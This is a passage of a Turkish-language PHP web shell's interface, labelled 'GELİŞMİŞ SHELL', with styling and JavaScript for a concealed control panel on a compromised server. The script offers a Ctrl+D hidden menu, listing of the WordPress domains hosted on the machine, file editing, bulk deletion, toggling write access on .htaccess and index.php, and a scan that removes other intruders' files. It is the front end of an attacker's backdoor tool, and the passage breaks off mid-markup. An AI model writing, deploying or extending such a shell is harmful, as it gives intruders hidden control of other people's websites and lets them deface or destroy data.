color:#00a8ff; font-size:14px; } .top-bar { display:flex; gap:10px; flex-wrap:wrap; margin-bottom:20px; align-items:center; justify-content:flex-end; background:#353b48; padding:10px 15px; border-radius:8px; } .action-btn { display:inline-block; padding:8px 16px; border-radius:6px; text-decoration:none; font-weight:600; text-align:center; cursor:pointer; border:none; font-size:12px; transition:all 0.2s; } .action-btn.close { background:#e84118; color:#fff; } .action-btn.open { background:#44bd32; color:#fff; } .action-btn.izin { background:#f39c12; color:#000; } .action-btn.deploy { background:#8e44ad; color:#fff; } .action-btn.wp { background:#3498db; color:#fff; } .action-btn.scan { background:#e67e22; color:#fff; } .action-btn.domain { background:#00a8ff; color:#fff; } .action-btn.malicious { background:#e84118; color:#fff; } .action-btn.permission { background:#1abc9c; color:#fff; } .action-btn:hover { opacity:0.85; transform:translateY(-1px); } .toolbar { display:flex; gap:8px; flex-wrap:wrap; margin-bottom:20px; background:#353b48; padding:10px 15px; border-radius:8px; align-items:center; } button, a.button { background:#40739e; color:#fff; border:none; padding:8px 14px; border-radius:6px; cursor:pointer; text-decoration:none; font-size:12px; transition:all 0.2s; } button:hover, a.button:hover { background:#487eb0; } .danger { background:#e84118; } .danger:hover { background:#c23616; } .success { background:#44bd32; } .warning { background:#f39c12; color:#000; } .info { background:#00a8ff; } .row { display:grid; grid-template-columns:30px 2fr auto; gap:10px; align-items:center; background:#353b48; padding:8px 12px; border-radius:8px; margin:4px 0; transition:background 0.2s; } .row:hover { background:#40739e; } .row.malicious { background:#3d2d2d; border-left:3px solid #e84118; } .row.protected { background:#2d2d2d; border-left:3px solid #44bd32; opacity:0.9; } .name a { color:#00a8ff; text-decoration:none; } .name a:hover { text-decoration:underline; } .wp-badge, .our-badge, .malicious-badge, .protected-badge, .inactive-badge { padding:2px 8px; border-radius:20px; font-size:10px; margin-left:8px; font-weight:600; display:inline-block; } .wp-badge, .our-badge, .protected-badge { background:#44bd32; color:#000; } .malicious-badge { background:#e84118; color:#fff; } .inactive-badge { background:#888; color:#fff; } .inline-controls { display:flex; gap:6px; align-items:center; flex-wrap:wrap; } .list-header { display:flex; justify-content:space-between; align-items:center; margin:15px 0 10px; } hr { border:1px solid #353b48; margin:20px 0; } .modal { display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.85); z-index:1000; align-items:center; justify-content:center; } .modal.active { display:flex; } .modal-content { background:#2f3640; padding:25px; width:900px; max-width:90%; border-radius:12px; max-height:80vh; overflow-y:auto; } .modal-content h3 { margin-top:0; } .toast { position:fixed; bottom:30px; right:30px; background:#2f3640; color:#fff; padding:12px 20px; border-radius:8px; z-index:9999; border-left:4px solid #44bd32; box-shadow:0 4px 12px rgba(0,0,0,0.3); max-width:400px; word-break:break-word; font-size:13px; white-space:pre-line; animation: fadeInOut 3s ease forwards; } .toast.error { border-left-color:#e84118; } .toast.success { border-left-color:#44bd32; } .toast.info { border-left-color:#00a8ff; } @keyframes fadeInOut { 0% { opacity:0; transform:translateY(20px); } 10% { opacity:1; transform:translateY(0); } 90% { opacity:1; } 100% { opacity:0; transform:translateY(-20px); visibility:hidden; } } .domain-list { max-height:400px; overflow-y:auto; margin:15px 0; border:1px solid #40739e; border-radius:8px; } .domain-item { padding:12px; background:#353b48; margin:2px 0; cursor:pointer; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; } .domain-item:hover { background:#40739e; } .domain-url { color:#00a8ff; font-weight:bold; font-size:14px; } .domain-path { color:#888; font-size:11px; margin-top:4px; } .domain-stats { display:flex; gap:10px; margin-bottom:15px; flex-wrap:wrap; } .domain-stat-box { background:#353b48; padding:10px 15px; border-radius:8px; text-align:center; } .delete-section { margin-top:20px; background:#3d2d2d; border-radius:10px; border-left:3px solid #e84118; overflow:hidden; } .delete-title { color:#e84118; font-weight:bold; padding:12px 18px; cursor:pointer; display:flex; justify-content:space-between; align-items:center; user-select:none; } .delete-title:hover { background:rgba(232,65,24,0.15); } .delete-title .toggle-arrow { font-size:11px; transition:transform 0.25s; } .delete-title.collapsed .toggle-arrow { transform:rotate(-90deg); } .delete-body { padding:0 18px 18px; } .delete-body.collapsed { display:none; } .pre-box { background:#1e272e; padding:15px; border-radius:8px; color:#0f0; font-family:'Courier New',monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; font-size:12px; line-height:1.5; } .stats { background:#353b48; padding:12px 15px; border-radius:8px; margin:15px 0 0; display:flex; gap:20px; flex-wrap:wrap; } .stat-item { flex:1; text-align:center; } .stat-value { font-size:28px; font-weight:bold; color:#00a8ff; } .stat-label { font-size:11px; color:#888; margin-top:4px; } .editor-container { background:#1e272e; border-radius:10px; overflow:hidden; margin-top:10px; border:1px solid #40739e; } .editor-header { background:#2f3640; padding:12px 15px; border-bottom:1px solid #40739e; display:flex; justify-content:space-between; align-items:center; flex-wrap:wrap; gap:10px; } .editor-title { font-size:14px; font-weight:600; color:#00a8ff; word-break:break-all; } .editor-title code { background:#1e272e; padding:4px 8px; border-radius:5px; font-size:12px; } .editor-buttons { display:flex; gap:8px; } .editor-buttons button { padding:6px 14px; font-size:12px; } .editor-buttons .save-btn { background:#44bd32; color:#000; font-weight:bold; } .editor-buttons .save-btn:hover { background:#55dd44; } .editor-buttons .cancel-btn { background:#e84118; } .editor-buttons .copy-btn { background:#3498db; } .editor-textarea { width:100%; min-height:500px; background:#0d1117; color:#e6edf3; border:none; padding:15px; font-family:'Monaco', 'Menlo', 'Ubuntu Mono', 'Consolas', monospace; font-size:13px; line-height:1.6; resize:vertical; outline:none; tab-size:4; } .editor-textarea:focus { outline:none; background:#161b22; } .editor-info { background:#2f3640; padding:8px 15px; font-size:11px; color:#888; display:flex; justify-content:space-between; flex-wrap:wrap; gap:10px; border-top:1px solid #40739e; } .editor-info span { color:#00a8ff; } .warning-box { background:#e84118; padding:12px 15px; border-radius:8px; margin-bottom:15px; color:#fff; font-weight:500; display:flex; align-items:center; gap:10px; } .warning-box::before { content:"⚠️"; font-size:18px; } .upload-row { display:flex; gap:10px; align-items:center; flex-wrap:wrap; } .hidden-menu { background:#2d2d2d; padding:10px 15px; border-radius:8px; margin-bottom:15px; border-left:3px solid #f39c12; display:flex; align-items:center; gap:10px; flex-wrap:wrap; } .hidden-menu.hidden { display:none; } .hidden-menu-title { color:#f39c12; font-size:12px; display:flex; align-items:center; gap:8px; } .loading-overlay { position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.5); z-index:10000; display:flex; align-items:center; justify-content:center; visibility:hidden; } .loading-overlay.active { visibility:visible; } .spinner { width:50px; height:50px; border:3px solid #40739e; border-top-color:#00a8ff; border-radius:50%; animation: spin 1s linear infinite; } @keyframes spin { to { transform:rotate(360deg); } } .checkbox-column { width:30px; text-align:center; } .wp-count-badge { background:#00a8ff; color:#fff; padding:4px 12px; border-radius:20px; font-size:12px; font-weight:bold; margin-left:10px; } </style> <script> function toggleAll(s){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function toggleMalicious(s){ var checkboxes = document.querySelectorAll("input[name='selected[]']"); checkboxes.forEach(cb => cb.checked = s.checked); } function showRenameModal(path,name){ document.getElementById('rename_old').value = path; document.getElementById('rename_new').value = name; document.getElementById('renameModal').classList.add('active'); } function hideRenameModal(){ document.getElementById('renameModal').classList.remove('active'); } function showDomainModal(){ document.getElementById('domainModal').classList.add('active'); } function hideDomainModal(){ document.getElementById('domainModal').classList.remove('active'); } function showMaliciousModal(){ document.getElementById('maliciousModal').classList.add('active'); } function hideMaliciousModal(){ document.getElementById('maliciousModal').classList.remove('active'); } function goToDomain(path){ window.location.href = '?dir=' + encodeURIComponent(path); } function openDomainUrl(url){ window.open(url, '_blank'); } function downloadFile(path){ window.location.href = '?download=' + encodeURIComponent(path); } function analyzeFile(path){ var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input name="action" value="analyze"><input name="file" value="' + path.replace(/"/g, '"') + '">'; document.body.appendChild(form); form.submit(); } function editFile(path){ window.location.href = '?editf=' + btoa(unescape(encodeURIComponent(path))) + '&dir=<?php echo urlencode($current_dir); ?>'; } function openUrl(url){ window.open(url, '_blank'); } function toggleSection(titleEl){ titleEl.classList.toggle('collapsed'); var body = titleEl.nextElementSibling; body.classList.toggle('collapsed'); } function showToast(message, type){ if(!message) return; var toast = document.createElement('div'); toast.className = 'toast ' + (type || 'info'); toast.innerHTML = message.replace(/\n/g, '<br>'); document.body.appendChild(toast); setTimeout(function(){ if(toast && toast.remove) toast.remove(); }, 4000); } function kilitIslem(action){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?kilit_ajax=' + action + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast(response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function checkPermissions(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=check&file=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ var msg = ''; if(response.htaccess.exists){ msg += '📁 .htaccess: ' + (response.htaccess.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📁 .htaccess: ❌ Dosya yok'; } msg += '\n'; if(response.index.exists){ msg += '📄 index.php: ' + (response.index.writable ? '✅ Yazılabilir' : '❌ Salt Okunur'); } else { msg += '📄 index.php: ❌ Dosya yok'; } showToast(msg, 'info'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setHtaccessWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_htaccess&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ .htaccess ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function setIndexWritable(writable){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?file_permission_action=set_index&file=<?php echo urlencode($current_dir); ?>&writable=' + writable + '&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success && response.message){ showToast('✅ index.php ' + response.message, 'success'); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function scanMaliciousAjax(){ var pass = prompt('Şifre:'); if(!pass) return; var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?scan_ajax=1&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function bulkDeleteAjax(){ var checkboxes = document.querySelectorAll("input[name='bulk_delete[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosya/klasör seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('||')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function deleteSelectedMalicious(){ var checkboxes = document.querySelectorAll("input[name='selected[]']:checked"); if(checkboxes.length === 0){ showToast('❌ Lütfen silinecek dosyaları seçin!', 'error'); return; } var pass = prompt('Şifre:'); if(!pass) return; var paths = []; checkboxes.forEach(cb => paths.push(cb.value)); var btn = event.target; var originalText = btn.innerHTML; btn.innerHTML = '⏳ ...'; btn.disabled = true; var xhr = new XMLHttpRequest(); xhr.open('GET', '?bulk_delete_ajax=1&paths=' + encodeURIComponent(paths.join('||')) + '&dir=<?php echo urlencode($current_dir); ?>&pass=' + encodeURIComponent(pass), true); xhr.onload = function(){ try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ ' + response.message, 'success'); setTimeout(function(){ location.reload(); }, 1500); } } catch(e){} btn.innerHTML = originalText; btn.disabled = false; }; xhr.onerror = function(){ btn.innerHTML = originalText; btn.disabled = false; }; xhr.send(); } function saveFile(){ var content = document.getElementById('editor-content').value; var file = document.getElementById('edit-file').value; var currentDir = document.getElementById('current-dir').value; var loadingOverlay = document.getElementById('loading-overlay'); loadingOverlay.classList.add('active'); var xhr = new XMLHttpRequest(); xhr.open('POST', '', true); xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest'); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onload = function(){ loadingOverlay.classList.remove('active'); try { var response = JSON.parse(xhr.responseText); if(response.success){ showToast('✅ Kaydedildi', 'success'); setTimeout(function(){ window.location.href = '?dir=' + encodeURIComponent(currentDir); }, 1000); } } catch(e){} }; xhr.onerror = function(){ loadingOverlay.classList.remove('active'); }; xhr.send('action=edit&file=' + encodeURIComponent(file) + '&content=' + encodeURIComponent(content) + '¤t_dir=' + encodeURIComponent(currentDir)); } document.addEventListener('keydown', function(e){ if(e.ctrlKey && e.key === 'd'){ e.preventDefault(); var hiddenMenu = document.getElementById('hidden-menu'); if(hiddenMenu.classList.contains('hidden')){ hiddenMenu.classList.remove('hidden'); showToast('🔓 Gizli menü gösteriliyor', 'info'); } else { hiddenMenu.classList.add('hidden'); showToast('🔒 Gizli menü gizlendi', 'info'); } } }); function copyToClipboard(){ var textarea = document.getElementById('editor-content'); textarea.select(); document.execCommand('copy'); showToast('📋 Kopyalandı!', 'success'); } </script> </head> <body> <div class="container"> <div style="background:#353b48; padding:8px; margin-bottom:15px; text-align:center; color:#00a8ff; font-weight:bold; border-radius:8px; font-size:13px;"> 🔥 GELİŞMİŞ SHELL | <?php echo implode(', ', $allowed_shells); ?> <span class="wp-count-badge">📊 WP DOMAIN: <?php echo $wp_domain_count; ?></span> </div> <div class="top-bar"> <a href="?logout=1" class="button">🚪 Çıkış</a> </div> <div id="hidden-menu" class="hidden-menu hidden"> <span class="hidden-menu-title">🔐 GİZLİ MENÜ (Ctrl+D)</span> <button class="action-btn domain" onclick="showDomainModal()">🌐 WP Domainler (<?php echo $wp_domain_count; ?>)</button> <button class="action-btn scan" onclick="scanMaliciousAjax()">🔍 ZARARLI TARA</button> <?php if (!empty($malicious_files)): ?> <button class="action-btn malicious" onclick="showMaliciousModa